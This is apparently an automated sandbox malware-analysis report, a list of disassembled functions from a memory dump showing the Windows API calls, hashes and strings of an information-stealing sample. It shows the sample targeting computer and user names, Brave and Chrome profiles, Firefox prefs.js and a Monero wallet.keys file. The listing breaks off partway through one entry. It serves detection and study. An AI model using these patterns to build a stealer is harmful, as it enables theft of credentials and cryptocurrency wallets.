                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 363a3a20e272b2559a3218a86e97f4fa0b1da7d8d838371133be199795487219
                              • Instruction ID: 518c8400fe940e08acec1c1ada1cbf87e2f199aba1f584dcc8603c6a4e28df5d
                              • Opcode Fuzzy Hash: 363a3a20e272b2559a3218a86e97f4fa0b1da7d8d838371133be199795487219
                              • Instruction Fuzzy Hash: C6113370900108A7CB54FFA4DD52AED773AAF50301F40425CFC1A5A192EF30AB0EC795
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0065792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: cb7a0ae276c3ee581b8d7c34bf9c061afebad9dc1dffe6ec1721f0dad0eeb8e8
                              • Instruction ID: fc3f021cafb1c0db3785f310a202fb99f76e2f72814d945f20457a163a90f43e
                              • Opcode Fuzzy Hash: cb7a0ae276c3ee581b8d7c34bf9c061afebad9dc1dffe6ec1721f0dad0eeb8e8
                              • Instruction Fuzzy Hash: C80181B1A04208EBD714DF98DD45FAAFBB9FB04B22F10422AFA45E32C0C37559048BB1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0064112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00641132
                              • ExitProcess.KERNEL32 ref: 00641143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 04f759a7ccafb6396e0da882eddb37844e36e5d38f6a9bde56439e569256e4fe
                              • Instruction ID: 04e1c79afa58e02a90d55bb23a0e0023a2acb62132e3fcfde396715ffaebbc02
                              • Opcode Fuzzy Hash: 04f759a7ccafb6396e0da882eddb37844e36e5d38f6a9bde56439e569256e4fe
                              • Instruction Fuzzy Hash: B8E0867094530CFBF714ABA49C0AB087678BB04B41F100055F7087B1C0C6B42640979A
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006410B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006410F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 4b94805d86cff52192656a45e7ff63e1ccd9718ad6c946e632195e0778db2198
                              • Instruction ID: 12b0e3cd8ea89c974b2ffab7867a32bd1fe5295348c94f25174221410410a547
                              • Opcode Fuzzy Hash: 4b94805d86cff52192656a45e7ff63e1ccd9718ad6c946e632195e0778db2198
                              • Instruction Fuzzy Hash: BCF0E271641208BBE7189AA8AC49FAAB7ECE706B15F300448F904E7280D971AE40DBA4
                              APIs
                                • Part of subcall function 006578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657910
                                • Part of subcall function 006578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00657917
                                • Part of subcall function 006578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0065792F
                                • Part of subcall function 00657850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006411B7), ref: 00657880
                                • Part of subcall function 00657850: RtlAllocateHeap.NTDLL(00000000), ref: 00657887
                                • Part of subcall function 00657850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0065789F
                              • ExitProcess.KERNEL32 ref: 006411C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 6f1a10434e74d9242efc53d526a7b28901e7dfb297dedc44fd6158895ffa4fcb
                              • Instruction ID: d15f54029ef06b6d05583548ae76224e6a7ecc3a6faecc0ea4fac61c3f698a50
                              • Opcode Fuzzy Hash: 6f1a10434e74d9242efc53d526a7b28901e7dfb297dedc44fd6158895ffa4fcb
                              • Instruction Fuzzy Hash: 2FE012B591430557DF4473F4BC0AB2A329E6B15747F04043DFE05D7642FE29E844866E
                              APIs
                              • wsprintfA.USER32 ref: 006538CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 006538E3
                              • lstrcat.KERNEL32(?,?), ref: 00653935
                              • StrCmpCA.SHLWAPI(?,00660F70), ref: 00653947
                              • StrCmpCA.SHLWAPI(?,00660F74), ref: 0065395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00653C67
                              • FindClose.KERNEL32(000000FF), ref: 00653C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 6f63a519c4b4ac1050246ba54f5a12e648e8452436b1c537c9d96feab9163056
                              • Instruction ID: ae4f4d8883a04bd5c87f6907f0476a8ec555aa3e637901169b67ba6981d18b27
                              • Opcode Fuzzy Hash: 6f63a519c4b4ac1050246ba54f5a12e648e8452436b1c537c9d96feab9163056
                              • Instruction Fuzzy Hash: 92A162B1900218ABDB24DFA4DC85FEE7379BF48701F04459DB90D96281EB749B88CF62
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00660B32,00660B2B,00000000,?,?,?,006613F4,00660B2A), ref: 0064BEF5
                              • StrCmpCA.SHLWAPI(?,006613F8), ref: 0064BF4D
                              • StrCmpCA.SHLWAPI(?,006613FC), ref: 0064BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0064C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 597d1eb37f7d395b35c7e1554a643d7b6621cc2ed9a4cd368097e68ff1cb965f
                              • Instruction ID: 13b76fa283355b678b8446f775375365b08cd00d8aa2db87e914b6471313607d
                              • Opcode Fuzzy Hash: 597d1eb37f7d395b35c7e1554a643d7b6621cc2ed9a4cd368097e68ff1cb965f
                              • Instruction Fuzzy Hash: 804265729101089BDB54FBB0DD56EED737EAF84301F40466CBD0AA6181EE349B4DCBA6
                              APIs
                              • wsprintfA.USER32 ref: 0065492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00654943
                              • StrCmpCA.SHLWAPI(?,00660FDC), ref: 00654971
                              • StrCmpCA.SHLWAPI(?,00660FE0), ref: 00654987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00654B7D
                              • FindClose.KERNEL32(000000FF), ref: 00654B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 825eac5c2958553642429b936f0b89e64b89ba1b8510a0acf6eba8cc6cf948dc
                              • Instruction ID: f678626610896f0c5da7bb526f98080bdebd0a76837a0d39e29f16ed8276cf2c
                              • Opcode Fuzzy Hash: 825eac5c2958553642429b936f0b89e64b89ba1b8510a0acf6eba8cc6cf948dc
                              • Instruction Fuzzy Hash: 906187B1500208ABDB24EBA4DC45FEA737DBB48301F04459DF90996180EF75DB89CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00654580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00654587
                              • wsprintfA.USER32 ref: 006545A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 006545BD
                              • StrCmpCA.SHLWAPI(?,00660FC4), ref: 006545EB
                              • StrCmpCA.SHLWAPI(?,00660FC8), ref: 00654601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0065468B
                              • FindClose.KERNEL32(000000FF), ref: 006546A0
                              • lstrcat.KERNEL32(?,013DECA0), ref: 006546C5
                              • lstrcat.KERNEL32(?,013DDE58), ref: 006546D8
                              • lstrlen.KERNEL32(?), ref: 006546E5
                              • lstrlen.KERNEL32(?), ref: 006546F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: cfd81f51c716388c4d52d7e1f1dd36d6dc463b9d012dbad15f8f894392592025
                              • Instruction ID: 93e85c309e2d6f9c156b4ac604160c7758f9b7194f6efd43c0ba901258b72668
                              • Opcode Fuzzy Hash: cfd81f51c716388c4d52d7e1f1dd36d6dc463b9d012dbad15f8f894392592025
                              • Instruction Fuzzy Hash: DA5196B15002189FD764EB74DC89FEE737DBB58301F004599FA4996180EF749B888FA2
                              APIs
                              • wsprintfA.USER32 ref: 00653EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00653EDA
                              • StrCmpCA.SHLWAPI(?,00660FAC), ref: 00653F08
                              • StrCmpCA.SHLWAPI(?,00660FB0), ref: 00653F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0065406C
                              • FindClose.KERNEL32(000000FF), ref: 00654081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: a7b8eebadabfd1f63866145bb27de6666822d52861c2b2d9efa8881d74c4c159
                              • Instruction ID: d790c7d2ef35427a4d6e49f9ab03f48ca39b6c693eb462782f69b6a1f1791b1c
                              • Opcode Fuzzy Hash: a7b8eebadabfd1f63866145bb27de6666822d52861c2b2d9efa8881d74c4c159
                              • Instruction Fuzzy Hash: 4A51D9B2900218ABDB24FBB4DC85EEA737DBB44301F00459DB65992180EB75DB89CF65
                              APIs
                              • wsprintfA.USER32 ref: 0064ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0064ED55
                              • StrCmpCA.SHLWAPI(?,00661538), ref: 0064EDAB
                              • StrCmpCA.SHLWAPI(?,0066153C), ref: 0064EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0064F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 3f0e094551fe95f08caeb6939bdefcba6d917ec908213cc396e678abd2f0af0c
                              • Instruction ID: 06138ea04359b5ca6910e40176944f24f94803d9ec8d533fefe07c3e6fe7cb6b
                              • Opcode Fuzzy Hash: 3f0e094551fe95f08caeb6939bdefcba6d917ec908213cc396e678abd2f0af0c
                              • Instruction Fuzzy Hash: 2EE1B5719111189AEB94FBA0DC52EEE733ABF54301F40469DB90A66092EF306F8ECF55
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006615B8,00660D96), ref: 0064F71E
                              • StrCmpCA.SHLWAPI(?,006615BC), ref: 0064F76F
                              • StrCmpCA.SHLWAPI(?,006615C0), ref: 0064F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0064FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: b162701252aa71b8ae02dcd6a000b0e62bb9acfde8145e7ba6cb096211d0dd2d
                              • Instruction ID: fb95e82e4c5e1773d1f662854ee79e6b2bc46b07241500fe682cb7f709519217
                              • Opcode Fuzzy Hash: b162701252aa71b8ae02dcd6a000b0e62bb9acfde8145e7ba6cb096211d0dd2d
                              • Instruction Fuzzy Hash: 1FB155719001189BDB64FFA4DC55AEE737ABF54301F4086ACE80A9B181EF306B4DCB96
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0066510C,?,?,?,006651B4,?,?,00000000,?,00000000), ref: 00641923
                              • StrCmpCA.SHLWAPI(?,0066525C), ref: 00641973
                              • StrCmpCA.SHLWAPI(?,00665304), ref: 00641989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00641D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00641DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00641E20
                              • FindClose.KERNEL32(000000FF), ref: 00641E32
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: e838217b818d2e94dc431aeeadcf76a95e39358598a53ad127bc9859ebdbe986
                              • Instruction ID: c2d940146f72473a4ea5eb12c0997fe03f15d8c804fffe78e40af58b9e28f6fd
                              • Opcode Fuzzy Hash: e838217b818d2e94dc431aeeadcf76a95e39358598a53ad127bc9859ebdbe986
                              • Instruction Fuzzy Hash: 17124E719111189BDB59FBA0CC96AEE737ABF14301F40429DB90A66091EF306F8DCFA5
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00660C2E), ref: 0064DE5E
                              • StrCmpCA.SHLWAPI(?,006614C8), ref: 0064DEAE
                              • StrCmpCA.SHLWAPI(?,006614CC), ref: 0064DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0064E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
